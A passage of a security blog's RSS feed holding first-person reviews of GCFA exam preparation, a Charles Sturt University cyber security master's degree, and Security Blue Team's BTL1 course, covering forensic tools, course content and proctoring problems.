	srcset=&#34;https://thisinsecureworld.com/p/for508-giac-certified-forensic-analyst/3_hu_758d2423d13c24fa.png 480w, https://thisinsecureworld.com/p/for508-giac-certified-forensic-analyst/3_hu_651a24c2e1a7d4aa.png 1024w&#34;
	loading=&#34;lazy&#34;
	
		alt=&#34;Tools and artifacts! Score!&#34;
	
	
		class=&#34;gallery-image&#34; 
		data-flex-grow=&#34;283&#34;
		data-flex-basis=&#34;680px&#34;
	
&gt;&lt;br&gt;
&lt;em&gt;Tools &lt;em&gt;and&lt;/em&gt; artifacts! Score!&lt;/em&gt;&lt;/p&gt;
&lt;p&gt;Now that I&amp;rsquo;ve noted these down, I&amp;rsquo;ll head out to the internet and do some open-source intelligence gathering (OSINT) looking for further clues. It would be immoral to obtain the courseware (and against the SANS copyright, which if discovered may lead to any instructor applications being insta-denied - no bueno!). What we can do instead though is look for indexes other students have created and posted online. This will help us flesh out our to-learn list with more nuance than the website may have provided.&lt;/p&gt;
&lt;p&gt;&lt;img src=&#34;https://thisinsecureworld.com/p/for508-giac-certified-forensic-analyst/4.png&#34;
	width=&#34;1214&#34;
	height=&#34;358&#34;
	srcset=&#34;https://thisinsecureworld.com/p/for508-giac-certified-forensic-analyst/4_hu_34ca89be15f65ee8.png 480w, https://thisinsecureworld.com/p/for508-giac-certified-forensic-analyst/4_hu_1446b0e6c3ed561b.png 1024w&#34;
	loading=&#34;lazy&#34;
	
		alt=&#34;Looks like we get very deep into NTFS attributes&#34;
	
	
		class=&#34;gallery-image&#34; 
		data-flex-grow=&#34;339&#34;
		data-flex-basis=&#34;813px&#34;
	
&gt;&lt;br&gt;
&lt;em&gt;Looks like we get &lt;em&gt;very&lt;/em&gt; deep into NTFS attributes&lt;/em&gt;&lt;/p&gt;
&lt;p&gt;Now that we know what we need to know, it&amp;rsquo;s time to get learning. My thought process now was to learn the artefacts (read, theory) first, before deploying tools and getting deep into the practical. To that end, I picked up my handy dandy copy of Incident Response and Computer Forensics, 3e. For an in depth review of this book, you can see this blog entry.&lt;/p&gt;
&lt;p&gt;For the purposes of preparing for GCFA, it gave me a timely refresher on NTFS artefacts, the incident response process, advantages of live response over dead disk forensics, etc. Everything a growing boy needs to pass this exam. As it&amp;rsquo;s a hard copy too, I can bring it in to the exam with me to reference, so even better there.&lt;/p&gt;
&lt;p&gt;Time to get hands on! In this portion, I worked out which tools I&amp;rsquo;d be using at each stage of the incident response lifecycle. I built a small home lab with a couple of windows workstations, an AD server, a file server, and a Kali box. This let me leverage my GCIH experience to generate a compromised environment with artefacts aplenty.&lt;/p&gt;
&lt;p&gt;&lt;img src=&#34;https://thisinsecureworld.com/p/for508-giac-certified-forensic-analyst/5.png&#34;
	width=&#34;1310&#34;
	height=&#34;472&#34;
	srcset=&#34;https://thisinsecureworld.com/p/for508-giac-certified-forensic-analyst/5_hu_1bfd7024b16936eb.png 480w, https://thisinsecureworld.com/p/for508-giac-certified-forensic-analyst/5_hu_b484977f6e7f31f0.png 1024w&#34;
	loading=&#34;lazy&#34;
	
		alt=&#34;Babies first compromise&#34;
	
	
		class=&#34;gallery-image&#34; 
		data-flex-grow=&#34;277&#34;
		data-flex-basis=&#34;666px&#34;
	
&gt;&lt;br&gt;
&lt;em&gt;Babies first compromise&lt;/em&gt;&lt;/p&gt;
&lt;p&gt;After getting in and thoroughly hosting the network, I realised for IR purposes I needed something to start with, an initial lead, if you will. I performed more and more actions before getting frustrated and just downloading vanilla mimikatz onto Workstation 2. The resulting alert became my initial lead.&lt;/p&gt;
&lt;p&gt;&lt;img src=&#34;https://thisinsecureworld.com/p/for508-giac-certified-forensic-analyst/6.png&#34;
	width=&#34;1072&#34;
	height=&#34;606&#34;
	srcset=&#34;https://thisinsecureworld.com/p/for508-giac-certified-forensic-analyst/6_hu_4b957bc44027b15.png 480w, https://thisinsecureworld.com/p/for508-giac-certified-forensic-analyst/6_hu_9a0f1e2b66b601c8.png 1024w&#34;
	loading=&#34;lazy&#34;
	
		alt=&#34;One of the few times this is considered success&#34;
	
	
		class=&#34;gallery-image&#34; 
		data-flex-grow=&#34;176&#34;
		data-flex-basis=&#34;424px&#34;
	
&gt;&lt;br&gt;
&lt;em&gt;One of the few times this is considered success&lt;/em&gt;&lt;/p&gt;
&lt;p&gt;I had a play with &lt;a class=&#34;link&#34; href=&#34;https://github.com/davehull/Kansa&#34;  target=&#34;_blank&#34; rel=&#34;noopener&#34;
    &gt;Kansa&lt;/a&gt; to collect artefacts off the hosts. This was pretty cool, but I think it&amp;rsquo;s value really shines when you deploy it at scale. Honestly didn&amp;rsquo;t spend too much time on this outside of gaining a familiarity.&lt;/p&gt;
&lt;p&gt;Instead, I cracked open &lt;a class=&#34;link&#34; href=&#34;https://www.kroll.com/en/insights/publications/cyber/kroll-artifact-parser-extractor-kape&#34;  target=&#34;_blank&#34; rel=&#34;noopener&#34;
    &gt;KAPE&lt;/a&gt;, a fantastic tool that captures live response data from a target system, including things like the $MFT that require raw disk access. KAPE ships with a number of different pre-generated collection profiles to get you up and running super quick.&lt;/p&gt;
&lt;p&gt;&lt;img src=&#34;https://thisinsecureworld.com/p/for508-giac-certified-forensic-analyst/7.png&#34;
	width=&#34;1574&#34;
	height=&#34;640&#34;
	srcset=&#34;https://thisinsecureworld.com/p/for508-giac-certified-forensic-analyst/7_hu_245a573fd220981d.png 480w, https://thisinsecureworld.com/p/for508-giac-certified-forensic-analyst/7_hu_254bde01db27926.png 1024w&#34;
	loading=&#34;lazy&#34;
	
		alt=&#34;It just seemed appropriate to use the SANS Triage Package&#34;
	
	
		class=&#34;gallery-image&#34; 
		data-flex-grow=&#34;245&#34;
		data-flex-basis=&#34;590px&#34;
	
&gt;&lt;br&gt;
&lt;em&gt;It just seemed appropriate to use the SANS Triage Package&lt;/em&gt;&lt;/p&gt;
&lt;p&gt;After that, I used &lt;a class=&#34;link&#34; href=&#34;https://github.com/log2timeline/plaso&#34;  target=&#34;_blank&#34; rel=&#34;noopener&#34;
    &gt;plaso&lt;/a&gt; to take our artefacts and build a nice big super timeline. For each host, I worked through the timeline and identified as many artefacts of my own activity as I could, making notes on how they tied together, and which artefact provided which information. Used a bunch of artefact specific tools here too, like &lt;a class=&#34;link&#34; href=&#34;https://github.com/EricZimmerman/PECmd&#34;  target=&#34;_blank&#34; rel=&#34;noopener&#34;
    &gt;PECmd&lt;/a&gt; to parse prefetch files. Heck, if &lt;a class=&#34;link&#34; href=&#34;https://ericzimmerman.github.io/#!index.md&#34;  target=&#34;_blank&#34; rel=&#34;noopener&#34;
    &gt;Zimmerman wrote it&lt;/a&gt;, I probably used it in this phase (thank goodness for Eric Zimmerman).&lt;/p&gt;
&lt;p&gt;Having dropped a bunch of time on memory analysis in the past, I didn&amp;rsquo;t do too much to refresh this skill set. That said, I did find &lt;a class=&#34;link&#34; href=&#34;https://www.andreafortuna.org/2018/10/22/my-gcfa-exam-sketchbook/&#34;  target=&#34;_blank&#34; rel=&#34;noopener&#34;
    &gt;two books by Andrea Fortuna&lt;/a&gt; very useful. There was a GCFA sketchbook which, while I suspect it was written for the previous version of the training, was very useful. Possibly more importantly, the second book is basically a manual for &lt;a class=&#34;link&#34; href=&#34;https://www.volatilityfoundation.org/&#34;  target=&#34;_blank&#34; rel=&#34;noopener&#34;
    &gt;Volatility&lt;/a&gt;, which has man pages for a good chunk of the default modules. This I used a lot in the exam.&lt;/p&gt;
&lt;p&gt;I used the two practice tests in the middle of the above, mostly to fill gaps so I didn&amp;rsquo;t need to re-do work and make sure I was on the right track. They were valuable, but didn&amp;rsquo;t identify any additional tools or artefacts that needed to be worked in.&lt;/p&gt;
&lt;p&gt;Finally, I had a &amp;ldquo;mini index&amp;rdquo; created that was basically just a collection of SANS posters, and man pages for the likes of Zimmerman&amp;rsquo;s tools, event log types and codes, SID breakdowns, timestamps, NTFS artefacts, etc.&lt;/p&gt;
&lt;h2 id=&#34;certification&#34;&gt;Certification
&lt;/h2&gt;&lt;p&gt;This was, unfortunately, the worst testing experience I&amp;rsquo;ve had to date. This was for a few reasons, only one of which was the fault of GIAC (as far as I know).&lt;/p&gt;
&lt;p&gt;Some exam questions were a bit ambiguous. It felt like the question was being made deliberately unclear or convoluted, or tested my ability to comprehend English rather than apply technical knowledge to a problem. I feel that this was done in an attempt to make them artificially difficult.&lt;/p&gt;
&lt;p&gt;I took the ProctorU test in the comfort of my own home. When connecting, the proctor didn&amp;rsquo;t speak to me at all, and just provided all instruction over the Logmein chat system. While this was functional, there were no instructions on what to do if anything went wrong. Bet you can&amp;rsquo;t see where this is going&amp;hellip;&lt;/p&gt;
&lt;p&gt;Yep, about halfway through my exam, the proctor pinged me and advised he needed to restart some things because my webcam wasn&amp;rsquo;t visible. Whatever my man, do what you need to. After about 10 minutes of poking around, I notice there&amp;rsquo;s no more interaction from the proctor. I alt-tab out to the Logmein chat, and see the session has been disconnected. Cue the nervous sweats.&lt;/p&gt;
&lt;p&gt;Webcam is still pointing at me, and my phone is on silent on the desk behind me. There&amp;rsquo;s a chance they&amp;rsquo;re calling me to get me to re-establish a connection. There&amp;rsquo;s also a chance they have an auto-reconnect procedure, and as soon as I get up to pick up my phone, they&amp;rsquo;re going to bounce me for cheating. Decision paralysis kicked in, and I just sat looking at my screen waiting (and straining my ears to hear the vibration of my phone ringing), for about 15 minutes.&lt;/p&gt;
&lt;p&gt;After 15 minutes, I decided enough was enough. I switched tabs out to the ProctorU sign in page, and refreshed. This allowed me to download a new Logmein package, and start again (in hindsight, I could have just re-run the executable I downloaded to start the exam, but that didn&amp;rsquo;t occur to me at the time. Shines under pressure, that&amp;rsquo;s me.)&lt;/p&gt;
&lt;p&gt;I was connected to a new proctor and explained the situation. After re-securing the room, I was allowed to continue my exam. Problem solved, right? &amp;hellip; almost. Despite my prompting otherwise, the proctor insisted on resuming my exam in chrome (the first half was sat in Firefox). After answering a single question, I was told I was locked out of my exam because (surprise surprise) the testing engine detected I was using a different browser. In the future I&amp;rsquo;ll be un-pinning Chrome (my personal browser) from the task bar, as this seems to cause proctors no end of confusion.&lt;/p&gt;
&lt;p&gt;Reaching out to the proctor, this was quickly rectified, and I was able to finish my exam in relative peace. And that, friends, is how I self studied and passed the GCFA exam. If you plan to walk this path yourself, good luck! If you have any questions, you can reach me via the social buttons on the left.&lt;/p&gt;
</description>
        </item>
        <item>
        <title>Charles Sturt University - Master of Cyber Security</title>
        <link>https://thisinsecureworld.com/p/charles-sturt-university-master-of-cyber-security/</link>
        <pubDate>Tue, 31 Aug 2021 05:31:00 +0000</pubDate>
        
        <guid>https://thisinsecureworld.com/p/charles-sturt-university-master-of-cyber-security/</guid>
        <description>&lt;p&gt;Date Earned: August 15, 2021&lt;br&gt;
Linky: &lt;a class=&#34;link&#34; href=&#34;https://itmasters.edu.au/course/master-of-cyber-security/&#34;  target=&#34;_blank&#34; rel=&#34;noopener&#34;
    &gt;https://itmasters.edu.au/course/master-of-cyber-security/&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;&lt;img src=&#34;https://thisinsecureworld.com/p/charles-sturt-university-master-of-cyber-security/1.png&#34;
	width=&#34;1474&#34;
	height=&#34;1084&#34;
	srcset=&#34;https://thisinsecureworld.com/p/charles-sturt-university-master-of-cyber-security/1_hu_c0be004105a689f2.png 480w, https://thisinsecureworld.com/p/charles-sturt-university-master-of-cyber-security/1_hu_dabec0a8d7fd8827.png 1024w&#34;
	loading=&#34;lazy&#34;
	
		alt=&#34;Oh no! You know my middle name is Cameron!&#34;
	
	
		class=&#34;gallery-image&#34; 
		data-flex-grow=&#34;135&#34;
		data-flex-basis=&#34;326px&#34;
	
&gt;&lt;br&gt;
&lt;em&gt;Oh no! You know my middle name is Cameron!&lt;/em&gt;&lt;/p&gt;
&lt;p&gt;This review is from the point of view of a mature aged student who already had a good deal of cyber security experience when starting study. This course required 12 classes to be undertaken and passed to have enough credits to pass the Masters. I applied for Recognition of Prior Learning (RPL) to six of these classes, in the form of:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;[CISSP]({{ $baseurl }}/isc2-cissp/) (two credits)&lt;/li&gt;
&lt;li&gt;Sec+ (one credit)&lt;/li&gt;
&lt;li&gt;ACS Certified Professional (two credits)&lt;/li&gt;
&lt;li&gt;ISFCE CCE (one credit)&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;I signed up through the IT Masters scheme.&lt;/p&gt;
&lt;h2 id=&#34;whos-it-for&#34;&gt;Who&amp;rsquo;s it for?
&lt;/h2&gt;&lt;p&gt;I&amp;rsquo;d recommend this Masters degree to anyone who wants to learn how to perform literature-based research, and gain or improve their formal writing capabilities. Outside these things, there are much better learning options for every class I took through uni except Network Security and Cryptography.&lt;/p&gt;
&lt;h2 id=&#34;training&#34;&gt;Training
&lt;/h2&gt;&lt;h3 id=&#34;network-security-and-cryptography&#34;&gt;Network Security and Cryptography
&lt;/h3&gt;&lt;p&gt;I was super lucky in getting Michael Bewong as the professor for this class. Michael taught us about cryptography, from the history of (rail fence, Caesar, etc) through to best in practice today (AES, RSA, etc). We get to perform RSA encryption, decryption and key generation by hand, which made me feel like a proper nerd (in a good way).&lt;/p&gt;
&lt;p&gt;Following that, we move on to network based authentication mechanisms, with NTLM and Kerberos. We learn the cryptographic principles underlying these technologies and how they can be attacked.&lt;/p&gt;
&lt;p&gt;The prescribed text for this class was &lt;a class=&#34;link&#34; href=&#34;https://www.pearson.com/store/p/cryptography-and-network-security-principles-and-practice-global-edition/P100000113984/9781292158587&#34;  target=&#34;_blank&#34; rel=&#34;noopener&#34;
    &gt;Cryptography and Network Security: Principles and Practice&lt;/a&gt;, and it was pretty great.&lt;/p&gt;
&lt;h3 id=&#34;hacking-countermeasures&#34;&gt;Hacking Countermeasures
&lt;/h3&gt;&lt;p&gt;This course was a watered down CEH. It covered the hacker mindset, and a range of tools. One assignment had us building a USB bourne password extractor, that could be used in conjunction with a social engineering attack. While a cool exercise, everything in this course would have been accomplished with CEH prep and an afternoon of google.&lt;/p&gt;
&lt;p&gt;The prescribed text for this class was the &lt;a class=&#34;link&#34; href=&#34;https://www.amazon.com.au/Certified-Ethical-Hacker-Guide-Fourth/dp/126045455X/ref=asc_df_126045455X/?tag=googleshopdsk-22&amp;amp;linkCode=df0&amp;amp;hvadid=341793124241&amp;amp;hvpos=&amp;amp;hvnetw=g&amp;amp;hvrand=8386260474932990887&amp;amp;hvpone=&amp;amp;hvptwo=&amp;amp;hvqmt=&amp;amp;hvdev=c&amp;amp;hvdvcmdl=&amp;amp;hvlocint=&amp;amp;hvlocphy=9069077&amp;amp;hvtargid=pla-638374236601&amp;amp;psc=1&#34;  target=&#34;_blank&#34; rel=&#34;noopener&#34;
    &gt;CEH Certified Ethical Hacker All-in-One Exam Guide, Fourth Edition&lt;/a&gt;.&lt;/p&gt;
&lt;h3 id=&#34;dark-web&#34;&gt;Dark Web
&lt;/h3&gt;&lt;p&gt;I hated this class with a passion. The content was largely around cyber crime, with a splash of TOR. The prescribed text for this class was &lt;a class=&#34;link&#34; href=&#34;https://www.amazon.com.au/Inside-Dark-Web-Rafiqul-Islam/dp/0367236222&#34;  target=&#34;_blank&#34; rel=&#34;noopener&#34;
    &gt;Inside the Dark Web&lt;/a&gt;, which was authored by the professor and assistant. It reads like a collection of uni papers smushed together, and there are sections that actively contradict each other. If this class wasn&amp;rsquo;t core (and therefore mandatory), I would have dropped it.&lt;/p&gt;
&lt;h3 id=&#34;emerging-technology-and-innovation&#34;&gt;Emerging Technology and Innovation
&lt;/h3&gt;&lt;p&gt;I really enjoyed this class. The idea here is you complete it in your last semester of uni, and research to a good level of detail some form of emerging technology, or even find a problem and research a novel solution. The research I performed for this was around a passion of mine: helping small businesses prepare their environments for incident response. If you&amp;rsquo;re interested, this research formed the core of my GCIH Gold paper, and there&amp;rsquo;ll be a link to that in a future post. This research was wrapped in project management and incremental updates, culminating in a written report and presentation of your findings. It really feels like a course written to give students a taste of the PhD life.&lt;/p&gt;
&lt;h3 id=&#34;cyber-warfare-and-terrorism&#34;&gt;Cyber Warfare and Terrorism
&lt;/h3&gt;&lt;p&gt;This course was decidedly ok. It leaned a bit too heavily into discussing cyber crime. Once we&amp;rsquo;d gotten through that, the bulk of our learning was achieved by researching technology used in warfare, and existing cyber-terrorism attacks. Reading books like &lt;a class=&#34;link&#34; href=&#34;https://www.amazon.com.au/Countdown-Zero-Day-Kim-Zetter/dp/0770436196&#34;  target=&#34;_blank&#34; rel=&#34;noopener&#34;
    &gt;Countdown To Zero Day: Stuxnet and the Launch of the World&amp;rsquo;s First Digital Weapon&lt;/a&gt; and blogs like &lt;a class=&#34;link&#34; href=&#34;https://www.fireeye.com/blog/threat-research/2016/11/fireeye_respondsto.html&#34;  target=&#34;_blank&#34; rel=&#34;noopener&#34;
    &gt;Mandiant&amp;rsquo;s Shamoon blog entry&lt;/a&gt; would provide you with a similar level of knowledge.&lt;/p&gt;
&lt;p&gt;The prescribed text for this course was &lt;a class=&#34;link&#34; href=&#34;https://blackwells.co.uk/bookshop/product/9781138640627?gC=ad0234829&amp;amp;gclid=EAIaIQobChMI3rmyipnW8wIV85JmAh3qUgsZEAQYAiABEgI6V_D_BwE&#34;  target=&#34;_blank&#34; rel=&#34;noopener&#34;
    &gt;Understanding Cyber-Warfare Politics, Policy, and Strategy&lt;/a&gt;, and it was ok.&lt;/p&gt;
&lt;h3 id=&#34;forensic-investigation&#34;&gt;Forensic Investigation
&lt;/h3&gt;&lt;p&gt;This class felt next to useless. The prescribed text was &lt;a class=&#34;link&#34; href=&#34;https://www.amazon.com.au/Computer-Forensics-Investigations-Christopher-Steuart/dp/1337568945/ref=asc_df_1337568945/?tag=googleshopdsk-22&amp;amp;linkCode=df0&amp;amp;hvadid=341743255824&amp;amp;hvpos=&amp;amp;hvnetw=g&amp;amp;hvrand=8825187723109813476&amp;amp;hvpone=&amp;amp;hvptwo=&amp;amp;hvqmt=&amp;amp;hvdev=c&amp;amp;hvdvcmdl=&amp;amp;hvlocint=&amp;amp;hvlocphy=9069077&amp;amp;hvtargid=pla-564463785085&amp;amp;psc=1&#34;  target=&#34;_blank&#34; rel=&#34;noopener&#34;
    &gt;Guide to Computer Forensics and Investigations&lt;/a&gt;, and it&amp;rsquo;s pretty amazing. There is a caveat on this book that it has some textual errors that give a strong impression that the upgrade from 6e to 7e wasn&amp;rsquo;t as well edited as it should have been. Despite that, I loved this book. Unfortunately, so did the professor. All the assessment material was taken from this book&amp;rsquo;s exercises, which felt like cheating, given the cost of this class.&lt;/p&gt;
&lt;p&gt;I was also disappointed by the professor. There were a number of instances in the class where when asked questions, the professor clearly didn&amp;rsquo;t know the answer and tried to either bluff his way through or stuck to the book. Unfortunately, in one instance, the book was also incorrect (some MFT time headers had shifted, which was in keeping with the MFT header format), and the professor backed the book to the hilt despite overwhelming contrary evidence.&lt;/p&gt;
&lt;h2 id=&#34;final-thoughts&#34;&gt;Final Thoughts
&lt;/h2&gt;&lt;p&gt;If you&amp;rsquo;re after formal research and writing skills, this Masters will deliver. If you want hands-on technical depth, save your money and hit YouTube, SANS, or home labs. The exception is Network Security and Cryptography with Michael Bewong - that class alone was worth showing up for.&lt;/p&gt;
</description>
        </item>
        <item>
        <title>SBT - Blue Team Level 1</title>
        <link>https://thisinsecureworld.com/p/sbt-blue-team-level-1/</link>
        <pubDate>Sun, 06 Jun 2021 04:39:00 +0000</pubDate>
        
        <guid>https://thisinsecureworld.com/p/sbt-blue-team-level-1/</guid>
        <description>&lt;p&gt;Date Earned: May 17, 2021&lt;br&gt;
Proof: &lt;a class=&#34;link&#34; href=&#34;https://www.credly.com/badges/9fec1b76-6012-48a3-a21c-866cf385dac0/public_url&#34;  target=&#34;_blank&#34; rel=&#34;noopener&#34;
    &gt;https://www.credly.com/badges/9fec1b76-6012-48a3-a21c-866cf385dac0/public_url&lt;/a&gt;&lt;br&gt;
Linky: &lt;a class=&#34;link&#34; href=&#34;https://securityblue.team/why-btl1/&#34;  target=&#34;_blank&#34; rel=&#34;noopener&#34;
    &gt;https://securityblue.team/why-btl1/&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;&lt;img src=&#34;https://thisinsecureworld.com/p/sbt-blue-team-level-1/1.png&#34;
	width=&#34;850&#34;
	height=&#34;530&#34;
	srcset=&#34;https://thisinsecureworld.com/p/sbt-blue-team-level-1/1_hu_9e9b21599afaa15d.png 480w, https://thisinsecureworld.com/p/sbt-blue-team-level-1/1_hu_f150963c1fef1682.png 1024w&#34;
	loading=&#34;lazy&#34;
	
		alt=&#34;Shiny gold coin!&#34;
	
	
		class=&#34;gallery-image&#34; 
		data-flex-grow=&#34;160&#34;
		data-flex-basis=&#34;384px&#34;
	
&gt;&lt;br&gt;
&lt;em&gt;Shiny gold coin&lt;/em&gt;&lt;/p&gt;
&lt;p&gt;I was pleasantly surprised by this training. I&amp;rsquo;d had a few people reach out asking what I thought about it, and I was lucky enough to take the course (£499 when I signed up). Having completed it, I&amp;rsquo;d highly recommend it to anyone wanting to jump into blue team work. I have some commentary around the incident response material and the exam itself below, but bottom line: this course is absolutely worth the price tag.&lt;/p&gt;
&lt;h2 id=&#34;whos-it-for&#34;&gt;Who&amp;rsquo;s it for?
&lt;/h2&gt;&lt;p&gt;This training is for anyone who&amp;rsquo;s been exposed to general computing, and wants to get into cyber security. It&amp;rsquo;s also for people in SOC roles who want to improve their skills, or bypassed SOC experience and want to see what they missed. It&amp;rsquo;s a super valuable course that I can&amp;rsquo;t recommend highly enough.It&amp;rsquo;s also absolutely perfect for people looking to pick up soft skills with a heavy cyber security focus. It has solid sections on report writing, teamwork, work from home and office etiquette, and mental health. I&amp;rsquo;d honestly recommend the course for this section alone.&lt;/p&gt;
&lt;h2 id=&#34;training&#34;&gt;Training
&lt;/h2&gt;&lt;h3 id=&#34;foundation&#34;&gt;Foundation
&lt;/h3&gt;&lt;p&gt;The training provided by SBT is broken into 5 main domains, so this review will be too! Outside of the technical domains, this course is somewhat unique in that it starts with an overview of security roles and how they all tie together, giving new students a common foundation.&lt;/p&gt;
&lt;p&gt;We learn about security (physical and cyber), the technology and appliances that cyber professionals use, and networking fundamentals (TCP/IP, OSI, and common protocols like ARP, DNS, HTTP, IP, etc).&lt;/p&gt;
&lt;p&gt;Beyond technical content, the course covers communication (written and oral), team building, problem solving, and office etiquette (wear pants, even when working from home got a chuckle out of me). This soft skills content is generally overlooked by training but invaluable for new workforce entrants.&lt;/p&gt;
&lt;p&gt;Most importantly, this training covers mental health: imposter syndrome, burnout, and alert fatigue. From personal experience, imposter syndrome can be crippling. I only learned about it from a fantastic manager at Mandiant. If I&amp;rsquo;d understood it earlier, it would have been enormously beneficial. Even if the rest of the course was rubbish, massive props to Security Blue Team for including this.&lt;/p&gt;
&lt;p&gt;Of course, the rest of the content isn&amp;rsquo;t rubbish, so let&amp;rsquo;s dive in.&lt;/p&gt;
&lt;h3 id=&#34;phishing-analysis&#34;&gt;Phishing Analysis
&lt;/h3&gt;&lt;p&gt;According to the &lt;a class=&#34;link&#34; href=&#34;https://www.verizon.com/business/resources/reports/dbir/&#34;  target=&#34;_blank&#34; rel=&#34;noopener&#34;
    &gt;Verizon Data Breach Report&lt;/a&gt; phishing is the most utilised initial infection vector used by threat actors. So it makes sense SOC analysts learn about this in depth. Through this training, we learn about the different type of malicious emails.&lt;/p&gt;
&lt;p&gt;We&amp;rsquo;re taught how to read email headers and identify anomalies in both the header and body of an email to quickly determine if an email is phishing or legitimate. Even if the sending domain looks legit, we&amp;rsquo;re taught how to break through that and identify spoofing.&lt;/p&gt;
&lt;p&gt;I know, you think malicious emails, you think malicious attachments. We learn how to pull these out of emails (manually, if we have to) and analyse them. We learn about the common phishing attachments (anyone shocked macro-enabled word documents is number one?), and how to analyse these safely too.&lt;/p&gt;
&lt;p&gt;Given that phishing emails frequently lead to phishing web pages (commonly to farm credentials), we also learn how to analyse these pages. Tools like URL2PNG let us interact with these websites without accessing them directly, which I hadn&amp;rsquo;t heard of before and thought was cool.&lt;/p&gt;
&lt;p&gt;We also learn how to analyse the domains behind the web pages, using things like &lt;code&gt;whois&lt;/code&gt; to identify young domains. We also learn to use our brains to identify things like typosquatting or URL shortening services and how they&amp;rsquo;re utilised by threat actors.&lt;/p&gt;
&lt;p&gt;As blue teamers, it&amp;rsquo;s critically important that we understand the defenses we can deploy to mitigate these attacks. SBT do a good job of describing configurations and technology that can be implemented to help protect our customers or employers.&lt;/p&gt;
&lt;h3 id=&#34;threat-intelligence&#34;&gt;Threat Intelligence
&lt;/h3&gt;&lt;p&gt;As we dive into threat intelligence (TI), we learn all about the different types of threat actors (hacktivists, cyber criminals, nation states, insiders, etc). We learn about different techniques different groups will use, and how that may inform our incident response engagements or investigations. There&amp;rsquo;s a good level of detail in this section about APT groups, and the MITRE ATT&amp;amp;CK framework.&lt;/p&gt;
&lt;p&gt;We learn about different sources of threat intelligence, and the forms this intelligence may take. It may be open source intelligence (OSINT) that we can find ourselves, or hidden behind paywalls where you have to subscribe to a service to get access to the intel.&lt;/p&gt;
&lt;p&gt;The intel itself may be in the form of a human readable report, or in a variety of formats designed for ingestion by intel or security platforms. We dive into indicators of compromise and the platforms that support them (STIX, TAXII, OpenIOC, Yara, etc), and how these can be leveraged by TI teams.&lt;/p&gt;
&lt;p&gt;We learn about intelligence sharing platforms, and have a lab where we can set up &lt;a class=&#34;link&#34; href=&#34;https://www.misp-project.org/&#34;  target=&#34;_blank&#34; rel=&#34;noopener&#34;
    &gt;MISP&lt;/a&gt; for use in our own engagements. Of course, we learn about information sharing within our local communities, or the global infosec community, and some considerations around each.&lt;/p&gt;
&lt;p&gt;Finally, this discussion would be incomplete without coverage of the Lockheed Martin cyber kill chain. This kill chain informs how the rest of our intelligence can be used at strategic and tactical levels, and sets our organisation up for success.&lt;/p&gt;
&lt;h3 id=&#34;digital-forensics&#34;&gt;Digital Forensics
&lt;/h3&gt;&lt;p&gt;In diving into digital forensics, we get down and dirty with the low level workings of various file systems and how they&amp;rsquo;re utilised by different operating systems. For example, the Windows layout of an NTFS drive is completely alien to an EXT4 drive used by a linux OS.&lt;/p&gt;
&lt;p&gt;We also learn about hardware. What&amp;rsquo;s great (and not so great) about SSD drives for us as digital forensic practitioners. When and how to use write blockers and anti-static wrist straps. We are told about how to plan for various investigations, the importance of evidence preservation and chains of custody, and the criticality of solid documentation. Yep, we write down our mistakes - it&amp;rsquo;s almost more important than documenting the things that work!&lt;/p&gt;
&lt;p&gt;Erasing files via the standard recycle bin and more challenging forensically sound techniques are covered in a good level of detail. Both Windows and Linux artifacts are covered both in what they are and how to analyse them in a good level of detail.&lt;/p&gt;
&lt;p&gt;As far as tools go, we get hands on with Autopsy (for disk) and Volatility (for Memory).&lt;/p&gt;
&lt;p&gt;We learn about what general legal proceedings look like, and how we can prepare both technically and non-technically for the interpersonal part of this work. Honestly, I&amp;rsquo;m probably missing a bunch here because I just sort of skimmed this section, as it was largely revision.&lt;/p&gt;
&lt;h3 id=&#34;security-incident-and-event-management-siem&#34;&gt;Security Incident and Event Management (SIEM)
&lt;/h3&gt;&lt;p&gt;The SIEM section was magnificently detailed. We learn about the history of a SIEM is, where it came from, and the problems it was intended to solve. We look into the challenges of data collection at scale, and when it makes sense (and when it doesn&amp;rsquo;t). There&amp;rsquo;s a pretty sweet section in the beginning covering different SIEM solutions (Arcsight, Greylog, LogRhythm, Splunk) complete with pretty pictures.&lt;/p&gt;
&lt;p&gt;Then we get to the meat and potatoes of SIEMs, which is aggregation and correlation. These sections detail the true value of a SIEM in that it can unearth patterns, threats and compromises you wouldn&amp;rsquo;t otherwise be aware of. It goes into how SIEMs can ingestion the likes of SIGMA rules, so that we can ingest feeds from our MISP and perform retroactive searches against collected data - that&amp;rsquo;s right, rules aren&amp;rsquo;t just forward looking anymore.&lt;/p&gt;
&lt;p&gt;Finally, we get a deep dive in Splunk, possibly the largest name in the SIEM game. We learn how to install Splunk in VM&amp;rsquo;s ourselves for learning, and try our hand against Splunks&amp;rsquo; Boss of the SOC challenges, where we learn to dig through decent amounts of data to investigate an incident. This provides enormous practical value both for the real world, and practice for the exam (hint hint). Practically, we learn about both searching retroactively, and creating alerts for proactive detections.&lt;/p&gt;
&lt;h3 id=&#34;incident-response&#34;&gt;Incident Response
&lt;/h3&gt;&lt;p&gt;The incident response process taught by BTL1 is pretty clearly based on the NIST SP 800-61. I was a little disappointed by this section, as it felt it was missing something, though I can&amp;rsquo;t quite enumerate what. I felt that it&amp;rsquo;s more heavily focused on (and possibly authored by) people more at home than a SOC than an incident response engagement.&lt;/p&gt;
&lt;p&gt;It goes into a good level of detail regarding the incident response lifecycle (Prepare, Detect / Analyse, Contain / Eradicate / Recover, Post incident activity (PIR)). We go on to learn about the difference between CERTs and CSIRT teams, and look into a case study with the greatest CERT on Earth, the New Zealand CERT (I&amp;rsquo;m a kiwi, but I&amp;rsquo;m totally not biased&amp;hellip;).&lt;/p&gt;
&lt;p&gt;This section dives into the incident response lifecycle, and it covers the different phases well, but it&amp;rsquo;s all a little clinical. I would have loved to see a case study or some other form of, if not a practical section, at least some thought-based exercises. Maybe a student is provided a scenario with a lead and some initial investigation, and needs to decide if it&amp;rsquo;s appropriate to pursue containment or how to guide the next phase of the investigation. Keen to see how this looks in BTL2.&lt;/p&gt;
&lt;p&gt;The report template provides a solid methodology for investigating the compromise. As the only part of the exam you&amp;rsquo;re actually marked on too, it&amp;rsquo;s a great mark of how ready the assessee is for the real world; writing reports like this for clients (either as a formal report or part of a ticketing system) is a critical skill.&lt;/p&gt;
&lt;h2 id=&#34;certification&#34;&gt;Certification
